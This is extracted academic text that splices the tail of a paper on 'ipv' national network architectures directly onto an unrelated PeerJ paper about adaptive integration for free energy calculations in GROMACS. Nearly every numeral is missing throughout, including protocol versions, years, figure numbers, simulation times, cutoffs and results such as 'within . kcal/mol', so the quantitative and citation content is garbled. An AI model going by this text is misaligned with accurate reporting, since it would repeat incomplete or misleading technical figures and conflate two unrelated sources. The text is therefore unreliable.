ipv networks. a major feature is the use of existing ipv networks between core networks, communicating via over tunnel mode. you can use the existing ipv public network to quickly establish connections between different regional ipv networks and implement penetration access. d. 
application —the ipv network via over tunnel connection this application implements the ipv network applications by over tunnel communication, the simplest system comprising the ipv client / server a, the ipv client / server b, the ipv og routers c, d. the biggest difference between this scenario and scenario is that the ipv public network address between routers c and d is based on over tunnel international journal of advanced network, monitoring and controls volume , no. , communication. this scenario simulates the ipv network using the existing ipv public network to achieve ipv network connectivity in different geographic regions under the current conditions, and has the ability to build a national network. the network topology is shown in figure . figure . the ipv network through over connection topology tunnel test the application implements the ipv network islands of n scenarios to be connected through the ipv over ipv core network to implement penetration access between different ipv networks. a major feature is the use of existing ipv networks between core networks, communicating via over tunnel mode. can use existing ipv quick connect different regions of the public network the ipv network, and access to achieve penetration. e. application —hybrid network architecture in this application, the client side of the ipv access router accesses the ipv network at the same time, the ipv network, and the network side of multiple ipv access routers access the user side of the same core router, and the network side of the core router simultaneous access to ipv networks and ipv networks (including public networks). can be achieved ( ) ipv clients penetrate the network access to other subnets ipv clients. ( ) ipv client normal access to the internet. ( ) ipv clients to access other autonomous domain of ipv clients. ( ) between the access routers using the ospfv dynamic router protocol networking. ( ) the ipv core routers can choose to use the over network to access the shanghai node ipv network, or use the pure ipv protocol to access the beijing node ipv network. the network topology is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . the ipv hybrid network topology architecture test this application scenario is mainly used to build an ipv network environment, seamlessly integrate ipv networks, and ipv networks. all ipv , ipv network islands are connected using the ipv protocol or the existing ipv public network. it is convenient and quick to connect independent networks in different regions to form a national unified network by using the ipv network system. viii. development and obstacles whether transitioning from ipv to ipv or evolving to ipv is a gradual process, it is necessary to maintain mature services based on ipv and support interoperability between new and old protocols. net network only charge network access fees, mainstream technology not well supported by successful business models, which is ipv of fatal weakness. ipv is supported by governments and vendors around the world. ipv supporter limited, difficult to scale and provide good service in the short term, relying on china's own development, it is difficult to fight ipv research network externalities and spend a huge human and financial resources have formed the results. it is difficult through the inlet into commercial use the network market to form economies of scale and reduce costs. international journal of advanced network, monitoring and controls volume , no. 
, ix. conclusion with the development of the internet, the number of internet users is increasing, and the lack of ipv address resources has become a bottleneck restricting its development. regardless of the evolution from ipv to ipv or to ipv , ipv -based mature services are required to support protocol compatibility. ipv absorbs a large number of advanced design concepts and technologies at home and abroad in the design and development process. it is a secure and controllable network information platform that can be compatible with the current ipv and ipv internet, and can operate independently. it is suitable for establishment. national government, banks and other private networks. the ipv network has established a digital domain name resolution center in shanghai, and has established sub-centers in beijing, changsha, and macao, and is operating normally. in military networks and some government networks, ipv may gain a place from the perspective of national security. regardless of future trends, providing a safe, efficient, stable and reliable network environment is our common goal. reference [ ] xie jianping etc. method of using whole digital code to assign address for computer [p]. us: , . . [ ] zang qianli etc. a survey on ipv address structure standardization researches [j]. chinese journal of computers. : - [ - - ]. [ ] xie jianping etc. a method of assigning addresses to network computers using the full decimal algorithm [p]. cn: zl . , . . . [ ] v. fuller, t. li,network working group. classless inter-domain routing (cidr): an address assignment and aggregation strategy, rfc- , . . [ ] kohler e, li j, paxson v, et al. observed structure of addresses in ip traffic [j]. ieee/acm transactions on networking, , ( ): - . [ ] information technology-future network- problem statement and requirement-part : naming and addressing, iso/iec dtr - , , . submitted september accepted february published march corresponding author f. marty ytreberg, ytreberg@uidaho.edu academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright mirabzadeh and ytreberg distributed under creative commons cc-by . open access implementation of adaptive integration method for free energy calculations in molecular systems christopher a. mirabzadeh and f. marty ytreberg , , department of physics, university of idaho, moscow, id, united states of america institute for modeling collaboration and innovation, university of idaho, moscow, id, united states of america institute for bioinformatics and evolutionary studies, university of idaho, moscow, id, united states of america abstract estimating free energy differences by computer simulation is useful for a wide variety of applications such as virtual screening for drug design and for understanding how amino acid mutations modify protein interactions. however, calculating free energy differences remains challenging and often requires extensive trial and error and very long simulation times in order to achieve converged results. here, we present an implementation of the adaptive integration method (aim). we tested our implementation on two molecular systems and compared results from aim to those from a suite of other methods. the model systems tested here include calculating the solvation free energy of methane, and the free energy of mutating the peptide gag to gvg. 
we show that aim is more efficient than other tested methods for these systems, that is, aim results converge to a higher level of accuracy and precision for a given simulation time. subjects computational biology, scientific computing and simulation keywords adaptive integration, monte carlo, free energy, solvation, protein, biomolecule introduction measuring free energy differences using computer simulations can be computationally expensive, yet is useful for many different applications (see e.g., steinbrecher & labahn, ; chodera et al., ; mobley et al., ; zhan et al., ; miller et al., ; petukh, li & alexov, ; zhan & ytreberg, ; miller et al., ; cournia, allen & sherman, ; hossain et al., ; aminpour, montemagno & tuszynski, ). specific examples include determining protein conformational preferences, virtual screening for drug design or drug discovery (steinbrecher & labahn, ; chodera et al., ; zhan & ytreberg, ; Śledź & caflisch, ; aminpour, montemagno & tuszynski, ; zhang et al., ). of specific relevance to the current study is that free energy calculations allow prediction of how amino acid mutations may modify protein-protein binding (zhan et al., ; miller et al., ; petukh, li & alexov, ; miller et al., ; geng et al., ). we are particularly interested in developing and implementing efficient methods for calculating free energy differences and using them to understand how amino acid mutations modify protein–protein and protein-substrate interactions. how to cite this article mirabzadeh ca, ytreberg fm. . implementation of adaptive integration method for free energy calculations in molecular systems. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ytreberg@uidaho.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. for this study, we have implemented the adaptive integration method (aim) introduced by fasnacht, swendsen & rosenberg ( ) for use in the gromacs (berendsen, van der spoel & van drunen, ) molecular dynamics simulation package, and have compared results to a suite of other methods. in previous studies, aim was shown to provide high quality, precise and efficient estimates of binding free energies (ytreberg, swendsen & zuckerman, ; kaus, arrar & mccammon, ; kaus & mccammon, ). we focus on alchemical free energy calculation where a system is transformed from one state to another via an unphysical pathway. the progress along the pathway that connects the two states is defined by the parameter λ. for this study, we are interested in two ways to explore λ space—both of which have the goal of obtaining equilibrium sampling of system configurations at discrete λ values along the pathway. the first way is to treat λ as a system variable that can be biased and sampled. a class of such methods, termed generalized ensemble, use an extended hamiltonian to sample λ (bitetti-putzer, yang & karplus, ). for example, λ-dynamics (kong & brooks, ; knight & brooks, ; knight & brooks, ) treats λ as a dynamic particle in the system with fictitious mass. by contrast, aim uses metropolis monte carlo to sample λ space (fasnacht, swendsen & rosenberg, ). 
monte carlo moves between values of λ are based on running estimates of free energy differences; this is a key distinction from other methods and allows aim to continuously improve the estimate for the free energy during the simulation. the second way to explore λ space is to perform standard molecular dynamics or monte carlo simulations at fixed values of λ, typically discarding some simulation time for equilibration. the configurational ensembles at each value of λ can then be used to estimate free energy differences (see e.g., lyubartsev, førrisdahl & laaksonen, ; gonçalves & stassen, ; kofke, ; shirts, mobley & chodera, ; chodera & shirts, ; klimovich, shirts & mobley, ). in order to provide comparisons for aim to fixed λ methods, we used the python tool alchemical-analysis.py (klimovich, shirts & mobley, ), part of the pymbar package (shirts & chodera, ). this tool estimates the free energy using a suite of methods such as the bennett acceptance ratio, multistate bennett acceptance ratio, thermodynamic integration and exponential averaging. for the current study, we chose two molecular systems that have well-documented results and are important starting points for biomolecular free energy studies. first, we calculated the solvation free energy of methane. simulations were performed and the free energies were calculated using the fixed λ methods provided by alchemical-analysis. simulations were also performed using aim and results compared to fixed λ simulations. using the lessons learned from the methane system, we then calculated the free energy of mutating the peptide gag to gvg in water. for both systems, we found that aim produces free energy estimates that are within statistical uncertainty of fixed λ methods but with greater efficiency (i.e., more accurate for a given simulation time).
methods
all methods, code and simulation input files are available in the supplemental materials. for this study, we performed alchemical free energy simulations where the system is changed from a reference state to an end state by constructing a reaction pathway that modifies, adds or removes atoms. such alchemical simulations are non-physical, i.e., the simulation does not represent what could occur naturally. since the free energy is a state variable, it is independent of the path taken, and we may provide any path we wish. to perform these simulations the reaction pathway is divided into many separate, non-physical, λ states between a reference state and an end state. the λ states represent the progress along the reaction pathway as the reference state transforms into the end state. like most methods used to calculate free energies we start from the identity

$F = U - TS,$   (1)

where $U$ is the potential energy, $T$ is the temperature and $S$ is the entropy of the system. for free energy differences we generalize the formulation of the change in free energy by separating calculations into two, non-overlapping, thermodynamic end states, a and b, at constant system temperature $T$,

$\Delta F \equiv \Delta F_{A \to B} = F_B - F_A = \Delta U - T\,\Delta S.$   (2)

$\Delta F$ is the change in free energy, $\Delta U$ is the change in potential energy and $\Delta S$ is the change in entropy of the system. according to statistical mechanics, the free energy difference between the two end states, a and b, of the system is given by the log of the ratio of the configurational partition functions (see discussion in chipot & pohorille ( )),

$\Delta F = -k_B T \ln \frac{Z[U_B(\vec{x})]}{Z[U_A(\vec{x})]}.$   (3)
here, $k_B$ is the boltzmann constant and $Z[U(\vec{x})]$ is the configurational partition function for the energy states $U_A(\vec{x})$ and $U_B(\vec{x})$, where $\vec{x}$ is the vector of configuration coordinates. the configurational partition function is given by

$Z[U(\vec{x})] = \int \exp(-\beta U(\vec{x}))\, d\vec{x},$   (4)

with $\beta = 1/(k_B T)$. computationally, we calculate free energy differences between end states by performing molecular dynamics simulations along a reaction pathway of intermediate states, defined by λ, such that $0 \le \lambda \le 1$. this pathway connects the two end states of the system. in the case of poor overlap, where the end states may be separated by a high energy barrier, $|U_B - U_A| \gg k_B T$, this pathway mitigates the otherwise very slow convergence of free energy estimates (shirts, mobley & chodera, ). care should be taken when choosing intermediate states such that there is adequate overlap in the conformation space between the end states (shirts, mobley & chodera, ; klimovich, shirts & mobley, ). for our simulations the number of λ values and time per λ were chosen through extensive trial and error (more on this below). the method of exponential averaging (dexp, iexp) (zwanzig, ) starts from eq. (3) above; by adding and subtracting $\exp(-\beta U(\vec{x}))$ in the integral of the configurational partition function of the numerator we end up with the final relationship,

$\Delta F_{ij} = -k_B T \ln \left\langle \exp\!\big(-\beta\, \Delta U_{ij}(\vec{x})\big) \right\rangle_{\lambda_i},$   (5)

where $\Delta F_{ij}$ is the free energy difference between $\lambda_i$ and $\lambda_j$ and $\langle\cdot\rangle_{\lambda_i}$ represents an average over the equilibrium configurations at $\lambda_i$. unlike some other methods, exponential averaging has an exact solution since it is only used to evaluate the difference between two states. however, it is the least efficient method and should not be used if the differences in potential energies are much larger than $k_B T$ (shirts & pande, ). in addition, exponential averaging can be noisy, biased and dependent on the tails of the distribution of λ states (bruckner & boresch, ; shirts & pande, ). for thermodynamic integration (ti) we estimate the free energy by first looking at the derivative of eq. (3) with respect to λ,

$\frac{\partial F}{\partial \lambda} = \left\langle \frac{\partial U}{\partial \lambda} \right\rangle_{\lambda}.$   (6)

this differential equation, eq. (6), can then be integrated to give

$\Delta F = \int_{\lambda=0}^{1} \left\langle \frac{\partial U_{\lambda}(\vec{x})}{\partial \lambda} \right\rangle_{\lambda} d\lambda,$   (7)

where the $\langle\cdot\rangle_{\lambda}$ notation represents the ensemble average at a given intermediate state λ. the free energy is estimated by numerically integrating eq. (7) after running equilibrium simulations at each intermediate λ state. since numerical integration is required, ti can be biased by the chosen method of integration. some of that bias can be removed by using cubic-spline interpolation or more complex integration estimators (shirts & pande, ; shyu & ytreberg, ).
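to make the difference between these estimators concrete, the short sketch below applies exponential averaging (eq. (5)) and thermodynamic integration (eq. (7)) to a one-dimensional harmonic model whose free energy difference is known in closed form. the model, temperature, λ grid and sample sizes are assumptions chosen only for illustration; this is not the alchemical-analysis.py workflow used in the paper.

```python
# toy comparison of eqs. (5) and (7): U_lambda(x) = 0.5*k(lambda)*x**2, for which the
# exact result is dF = 0.5*kT*ln(k1/k0). all parameters here are illustrative assumptions.
import numpy as np

rng = np.random.default_rng(1)
kT = 1.0
k0, k1 = 1.0, 4.0
lams = np.linspace(0.0, 1.0, 11)
k = lambda l: k0 + l * (k1 - k0)

def sample(l, n=100_000):
    """equilibrium configurations x ~ exp(-U_lambda(x)/kT) for this harmonic model."""
    return rng.normal(0.0, np.sqrt(kT / k(l)), size=n)

# thermodynamic integration, eq. (7): trapezoidal rule over <dU/dlambda>_lambda
means = np.array([np.mean(0.5 * (k1 - k0) * sample(l) ** 2) for l in lams])
dF_ti = np.sum(0.5 * (means[:-1] + means[1:]) * np.diff(lams))

# forward exponential averaging (dexp), eq. (5), accumulated over neighbouring pairs
dF_exp = 0.0
for li, lj in zip(lams[:-1], lams[1:]):
    x = sample(li)
    dU = 0.5 * (k(lj) - k(li)) * x ** 2      # U_j(x) - U_i(x) on configurations from state i
    dF_exp += -kT * np.log(np.mean(np.exp(-dU / kT)))

print("exact     :", 0.5 * kT * np.log(k1 / k0))
print("ti        :", dF_ti)
print("exp. avg. :", dF_exp)
```

run with progressively smaller sample sizes, the exponential average degrades faster than ti, illustrating the noise and bias issues noted above.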
the bennett (bennett, ) and multistate (shirts & chodera, ) bennett acceptance ratio (bar and mbar) methods are far more efficient than exponential averaging and are commonly used to avoid the shortcomings of other methods (shirts & pande, ; ytreberg, swendsen & zuckerman, ). bar and mbar typically achieve the same statistical precision as ti with fewer λ states unless the integrand for ti is very smooth (shirts & mobley, ; ytreberg, swendsen & zuckerman, ). the complete derivation can be found in bennett's paper (bennett, ), but the premise is: for sufficiently large samples $N_i$ of $U_i$ and $N_j$ of $U_j$,

$\Delta F(i \to j) = k_B T \ln \frac{\langle f(\Delta U_{ij} + C)\rangle_j}{\langle f(\Delta U_{ji} - C)\rangle_i} + C.$   (8)

$C$ is a shift constant,

$C = k_B T \ln \frac{N_j}{N_i},$   (9)

and $f(x)$ is the fermi function,

$f(x) = \frac{1}{1 + \exp(\beta x)}.$   (10)

equation (8) is the ratio of canonical averages of two different potentials $U_i$ and $U_j$ acting on the same configuration space, meaning it requires information from two neighboring states. however, this limitation is not too much of a concern with a trivial coordinate transformation or when using dummy coordinates in alchemical simulations. mbar, an extension of bar, differs in that it takes data from more than two states, hence the name "multistate". aim is similar to ti in that numerical integration of eq. (7) is performed; the key difference is how the averages $\langle \partial U/\partial \lambda \rangle_{\lambda}$ are obtained. aim uses metropolis monte carlo to move in λ space and ordinary running averages are calculated at each λ value. in aim, a random move from $\lambda_{\text{old}}$ to $\lambda_{\text{new}}$ is accepted with probability

$\min\{1,\; \exp[-\beta(U_{\text{new}} - U_{\text{old}}) + \beta(F_{\text{new}} - F_{\text{old}})]\},$   (11)

where $U_{\text{new}} - U_{\text{old}}$ is the difference in the potential energy for the old and new λ values, and $F_{\text{new}} - F_{\text{old}}$ is the estimated free energy difference based on the current running averages of ∂u/∂λ.
implementation
aim was implemented in gromacs as an expanded ensemble calculation. that is, the hamiltonian must be calculated along with its derivative, and an expanded ensemble step must be performed for every dynamics step. in gromacs, nstexpanded is the number of integration steps between attempted λ moves changing the system hamiltonian in expanded ensemble simulations. this value must be a multiple of nstcalcenergy, the number of steps before calculating the system energy, but can be greater or less than nstdhdl, the number of steps before calculating ∂u/∂λ (referred to as dhdλ in the gromacs documentation). for a detailed explanation of all technical terms see reference abraham et al. ( ). the gromacs package was further altered to print out the ∂u/∂λ averages computed by aim to the log file when aim is used as the lmc-mover. aim requires the ∂u/∂λ value from every dynamics step to be stored regardless of whether a move in λ space is attempted. since ∂u/∂λ is only calculated at each step where free energies are calculated, every nstdhdl steps, we set nstexpanded = nstdhdl = nstcalcenergy = 1 for aim simulations. this further implies that lmc-stats functions were not used during aim simulations because those functions modify the hamiltonian, which is not needed for aim. for the implementation of aim with gromacs we follow the outline given in our previous study ytreberg, swendsen & zuckerman ( ):
1. start the simulation from an equilibrated configuration at λ = 0 and perform one molecular dynamics step.
2. randomly choose a trial move in λ space; only moves to adjacent λ values are attempted (for a λ spacing of δλ, a move from the current λ to λ + δλ or λ − δλ may be attempted, but not to λ ± 2δλ).
3. calculate the difference in potential energy between the trial and current λ values.
4. estimate the free energy difference between the trial and current λ values using the running averages of ∂u/∂λ and the trapezoidal rule.
5. accept the trial λ with the probability given in eq. (11).
6. if the move is accepted then λ is updated to the trial value, otherwise the simulation stays at the current λ.
7. the running average of ∂u/∂λ is updated.
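the seven steps above can be sketched in a few lines of python. the snippet below is only an illustration of the bookkeeping, not the authors' gromacs patch: a one-dimensional harmonic model stands in for the md system, and the temperature, λ grid and helper names (free_energy_diff, dUdl) are assumptions made for the example.

```python
# schematic aim loop following steps 1-7; the "md step" is replaced by direct sampling
# from the 1-d model U_lambda(x) = 0.5*(1 + 3*lambda)*x**2 (exact dF = 0.5*kT*ln(4)).
import numpy as np

rng = np.random.default_rng(0)
kT = 1.0
lambdas = np.linspace(0.0, 1.0, 21)
k = lambda l: 1.0 + 3.0 * l
U = lambda x, l: 0.5 * k(l) * x ** 2
dUdl = lambda x, l: 0.5 * 3.0 * x ** 2           # analytic dU/dlambda for this model

sums = np.zeros(len(lambdas))                    # running sums of dU/dlambda per lambda
counts = np.zeros(len(lambdas))

def free_energy_diff(i, j):
    """trapezoidal estimate of F_j - F_i from the running <dU/dlambda> averages (step 4)."""
    lo, hi = min(i, j), max(i, j)
    means = sums / np.maximum(counts, 1)
    dF = np.sum(0.5 * (means[lo:hi] + means[lo + 1:hi + 1]) * np.diff(lambdas[lo:hi + 1]))
    return dF if j > i else -dF

i = 0                                            # step 1: start at lambda = 0
for step in range(50_000):
    x = rng.normal(0.0, np.sqrt(kT / k(lambdas[i])))   # stand-in for one dynamics step
    sums[i] += dUdl(x, lambdas[i])               # step 7: update the running average
    counts[i] += 1
    j = i + rng.choice([-1, 1])                  # step 2: trial move to a neighbouring lambda
    if 0 <= j < len(lambdas):
        dU = U(x, lambdas[j]) - U(x, lambdas[i])             # step 3
        dF = free_energy_diff(i, j)                          # step 4
        if rng.random() < min(1.0, np.exp((-dU + dF) / kT)): # step 5, eq. (11)
            i = int(j)                                       # step 6: accept the trial lambda

print("aim estimate of dF(0 -> 1):", free_energy_diff(0, len(lambdas) - 1))
print("exact result              :", 0.5 * kT * np.log(k(1.0) / k(0.0)))
```

because moves are accepted using the continuously updated free energy estimate, the walker gradually spends comparable time at every λ value, which is the asymptotically flat histogram discussed later in the paper.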
simulation details
the first system used here, methane in water, is detailed in systematic studies of force fields and the free energies of hydration of amino acid side chain analogs (sun et al., ; lyubartsev, førrisdahl & laaksonen, ; chodera & shirts, ; paliwal & shirts, ). for the gag to gvg mutation the pmx (gapsys et al., ) software package was used to construct the tri-peptide mutation. using pmx, we generated the hybrid protein structure and topology for simulations of the chosen mutation, alanine to valine. all simulations described in this paper were performed using the molecular dynamics package gromacs . . . the simulations were carried out at k and solvated in a dodecahedron box with tip p waters. the methane molecule was parameterized using the opls (optimized potential for liquid simulations) force field (jorgensen, maxwell & tirado-rives, ). the opls force field was chosen for this study because it is known to perform well on small molecules (shirts et al., ). in future studies, we anticipate using aim on protein systems where other force fields are more appropriate such as amber (salomon-ferrer, case & walker, ) and charmm (mackerell, banavali & foloppe, ). since all molecular dynamics force fields have similar form and number of parameters, it is expected that the performance of aim would not depend on the force field chosen. for the gag to gvg mutations, na+ and cl- ions were added to keep the simulation box neutral and reach a physiologically relevant mm salt concentration. for both systems, energy minimization was performed using steepest descent for , steps. the system was then equilibrated using simulated annealing for , ps to heat the system from k to k. for production simulations, electrostatic interactions were handled by reaction field with a cut-off of . nm, potential-shift-verlet modifier and verlet cutoff scheme. van der waals interactions were handled by twin range cutoffs with neighbor list cutoff of . nm and van der waals cutoff of . nm. the bonds involving hydrogens were constrained with the shake algorithm, allowing for a fs time step. long range dispersion corrections for energy and pressure were applied. for the free energy calculations, softcore scaling was used with parameters sc-power= , sc-r-power= and sc-alpha= . . in addition, the van der waals and coulomb interactions were separately turned on or off as a function of λ. that is, one is held fixed as a function of λ while the other changes. for the methods processed with alchemical-analysis.py we ran fixed λ simulations. that is, an equal amount of simulation time was spent at each λ value. for aim we ran expanded ensemble simulations where we alternate between taking molecular dynamics steps and attempting trial moves in λ space. that is, for aim the amount of time spent at each λ value is determined by the algorithm. in order to determine the best distribution of intermediate λ states we followed a simple strategy: (i) conduct short simulations with a small set of intermediates. (ii) generate a plot comparing slope values between aim and fixed λ. (iii) determine the locations of curvature in the estimate of the free energy. (iv) increase the density of intermediate states in locations of high curvature. (v) repeat until all areas of high curvature have been well explored. we note that these steps should be performed for any method where the slope of the free energy is used to calculate free energies, including both ti and aim. similar
steps would be performed for methods such as dexp, iexp, bar and mbar to ensure that energy differences are not too large between λ values.
figure: different λ densities for methane solvation free energy calculations. eight trial simulations of ps per λ for , and λ values. this shows how the number of λ values were chosen to effectively compare aim to fixed λ simulations. the circles indicate the region where the λ density needed to be increased.
results
methane
after conducting short simulations, generating plots to determine locations of high curvature and increasing λ density in those regions, we averaged eight trial simulations of ps per λ for separate λ distributions (see fig. ). we found, by progressively increasing the λ density between λ= . and λ= . , that a distribution of λ values gave us a dense enough distribution to properly compare aim to fixed λ methods for the methane simulations. figure is a violin plot to visualize the distribution and probability densities over the eight trials for each method as a function of simulation time per value of λ. a violin plot combines a box plot and a density plot to show the shape of the distribution around the mean. the thick black bar in the center represents the interquartile range, the white dot is the median and the thin black line going vertically through the middle represents the upper and lower adjacent values. reading a violin plot is similar to reading a density plot. the thicker parts represent high frequency values and the thinner parts represent low frequency values. the advantage of a violin plot over a box plot is that we are able to view the underlying distribution of the data.
figure: violin plot showing methane solvation results for λ values averaged over eight trials. a violin plot combines a box plot and a density plot to visualize the distribution and probability density. the graphic shows all methods have similarly converged at ns per λ. aim and aim-cubic converge earlier than other methods at ps per λ.
in fig. at ps per λ most methods have similar standard deviations of around . kcal/mol (visualized by the height of the violin shape in the figure), but the slower convergence of mbar in this case leads to a larger standard deviation of around . kcal/mol. by ps aim has converged to a smaller standard deviation of around . kcal/mol compared to the other methods at around . kcal/mol.
gag to gvg mutation
for the gag to gvg mutation we first tested a distribution of λ values averaged over trial simulations of ps and ps per λ; see fig. . by reviewing the smoothness of the function we concluded that λ values was sufficient. figure shows the convergence of the free energy for gag to gvg over time for each method. at just ps per λ value the aim estimates are within less than . kcal/mol of the converged ( ns per λ) result with a standard deviation of around . kcal/mol. all other methods are more than . kcal/mol from this converged result with larger standard deviations of around . kcal/mol. at ps all estimates are less than . kcal/mol from the converged result, but aim estimates have a standard deviation of around . kcal/mol compared to other methods at . kcal/mol. all methods have similarly converged at ns per λ.
discussion in the limit of infinite sampling, all rigorous methods (i.e., statistical mechanics-based methods), performed properly with the same force-field and parameters, will yield the same result within uncertainty. often, it is of interest to define accuracy by comparing results to experimental data. however, given that the purpose of this study is to compare various computational methods, we define accuracy by comparing results to the value upon which all methods converge. for fixed λ simulations the sampling time is typically the same for each λ state. sampling time must be increased whenever convergence has not been achieved. however, if bias is introduced by using an insufficient number of λ values in regions of high curvature, increased sampling leads to radical convergence problems (shyu & ytreberg, ; steinbrecher & labahn, ). if the curvature of the underlying free energy slope values is large, averaging over a state space that is not dense enough mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure different simulation times for alanine to valine mutation free energy calculations. eight trial simulations of λ values at ps, ps and ns per λ. note the smoothness of aim versus fixed λ simu- lations. aim requires less samples than fixed λ simulations to smooth the free energy function. full-size doi: . /peerjcs. /fig- ba r mb ar ie xp t i ti -c ub ic de xp ai m ai m- cu bi c . . . g (k ca l/m ol ) ps ba r mb ar ie xp t i ti -c ub ic de xp ai m ai m- cu bi c ps ba r mb ar ie xp t i ti -c ub ic de xp ai m ai m- cu bi c ns figure violin plot showing alanine to valine mutation results for λ values averaged over eight tri- als. the graphic shows all methods have similarly converged at ns per λ. aim and aim-cubic con- verge more rapidly than other methods and are mostly converged at ps per λ. full-size doi: . /peerjcs. /fig- to fully describe the state function propagates this bias requiring significantly increased sampling time to achieve convergence. for ti, the bias will persist even for infinite sampling. in addition, increasing sampling time may not be realistic when dealing with limited computational resources. paliwal & shirts ( ) make a detailed argument to why convergence may not be possible for all systems due to hard limitations in computational resources. in particular, both ti and aim are calculating the same slope averages and should agree very well for simple systems and reasonably long simulation times. however, before mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. convergence is reached, due to the fact that aim spends more time in some regions, we should not expect the approximation of aim to exactly match ti with similar sampling time until the number of λ values has been sufficiently increased in high curvature regions. once we have properly chosen the λ values then reasonably long simulations will lead to highly similar results between these two methods. aim is able to estimate the free energy for the amino acid mutation within . kcal/mol at a total simulation time of only ps. this is quite remarkable since ± . kcal/mol is typically the range that is desired for mutation studies. of course, further studies using a broader range of amino acid change are needed, but it suggests that aim may be suitable for quick estimation. 
we believe the reason that aim performs so well in such cases is due to the monte carlo sampling that allows aim to more efficiently sample λ space compared to fixed λ simulations. the reader may note that aim violates detailed balance since the acceptance criterion contains the free energy estimates that are updated continuously. aim does however obey detailed balance asymptotically. as simulation time increases, the average free energy differences between λ values reach an equilibrium and detailed balance is satisfied. once this equilibrium is attained the algorithm will sample all λ values equally, that is, the histogram of the number of configurations will become flat as a function of λ. conclusion in this report we have implemented the adaptive integration method (aim) for calculating free energy differences in gromacs and applied it to two molecular systems. we have shown agreement within statistical uncertainty between aim and a suite of fixed λ methods for methane solvation and an gag to gvg mutation. we have also shown that aim is more efficient than the other tested methods. that is, for a given amount of simulation time, aim has a higher level of accuracy and precision. we anticipate these findings will extend to larger, more complex systems. future studies will be performed to test whether this is the case. further, we found that running longer simulations with too few intermediate λ states generated results that were inconsistent between methods. the density and sampling convergence of theλstates directly influences the agreement between all the tested methods. since some states will contribute disproportionately to the variance of the estimate, we found that generating short test simulations of different λ densities before attempting longer simulations is advisable. additional information and declarations funding support for this research was provided by the national science foundation (deb and oia ) and the center for modeling complex interactions sponsored by the national institutes of health (p gm ). computer resources were provided in part by the institute for bioinformatics and evolutionary studies computational resources mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. core sponsored by the national institutes of health (p gm ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national science foundation: deb , oia . the center for modeling complex interactions sponsored by the national institutes of health: p gm . institute for bioinformatics and evolutionary studies computational resources core sponsored by the national institutes of health: p gm . competing interests the authors declare there are no competing interests. author contributions • christopher a. mirabzadeh conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • f. marty ytreberg conceived and designed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. 
data availability the following information was supplied regarding data availability: all code used to generate the results, including scripts and modified gromacs code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abraham m, van der spoel d, lindahl e, hess b. . gromacs user manual version . . . available at http//:www.gromacs.org. aminpour m, montemagno c, tuszynski ja. . an overview of molecular modeling for drug discovery with specific illustrative examples of applications. molecules ( ):article doi . /molecules . bennett ch. . efficient estimation of free energy differences from monte carlo data. journal of computational physics : – doi . / - ( ) - . berendsen hj, van der spoel d, van drunen r. . gromacs: a message-passing parallel molecular dynamics implementation. computer physics communications ( – ): – doi . / - ( ) -e. mirabzadeh and ytreberg ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http//:www.gromacs.org http://dx.doi.org/ . /molecules http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / - ( ) -e http://dx.doi.org/ . /peerj-cs. bitetti-putzer r, yang w, karplus m. . generalized ensembles serve to improve the convergence of free energy simulations. chemical physics letters ( – ): – doi . /s - ( ) - . bruckner s, boresch s. . efficiency of alchemical free energy simulations. i. a practical comparison of the exponential formula, thermodynamic integration, and bennett’s acceptance ratio method. journal of computational chemistry ( ): – doi . /jcc. . chipot c, pohorille a. . free energy calculations. new york: springer. chodera jd, mobley dl, shirts mr, dixon rw, branson k, pande vs. . alchemi- cal free energy methods for drug discovery: progress and challenges. current opinion in structural biology ( ): – doi . /j.sbi. . . . chodera jd, shirts mr. . replica exchange and expanded ensemble simulations as gibbs sampling: simple improvements for enhanced mixing. journal of chemical physics ( ): – doi . / . . cournia z, allen b, sherman w. . relative binding free energy calculations in drug discovery: recent advances and practical considerations. journal of chemical information and modeling ( ): – doi . /acs.jcim. b . fasnacht m, swendsen rh, rosenberg jm. . adaptive integration method for monte carlo simulations. physical review e ( ): - – - doi . /physreve. . . gapsys v, michielssens s, seeliger d, de groot bl. . pmx: automated protein struc- ture and topology generation for alchemical perturbations. journal of computational chemistry ( ): – doi . /jcc. . geng c, xue lc, roel-touris j, bonvin am. . finding the g spot: are predictors of binding affinity changes upon mutations in protein–protein interactions ready for it? wiley interdisciplinary reviews: computational molecular science ( ):e doi . /wcms. . gonçalves pfb, stassen h. . calculation of the free energy of solvation from molecular dynamics simulations. pure and applied chemistry ( ): – doi . /pac . hossain s, kabedev a, parrow a, bergström ca, larsson p. . molecular simulation as a computational pharmaceutics tool to predict drug solubility, solubilization processes and partitioning. european journal of pharmaceutics and biopharmaceutics (february): – doi . /j.ejpb. . . . 
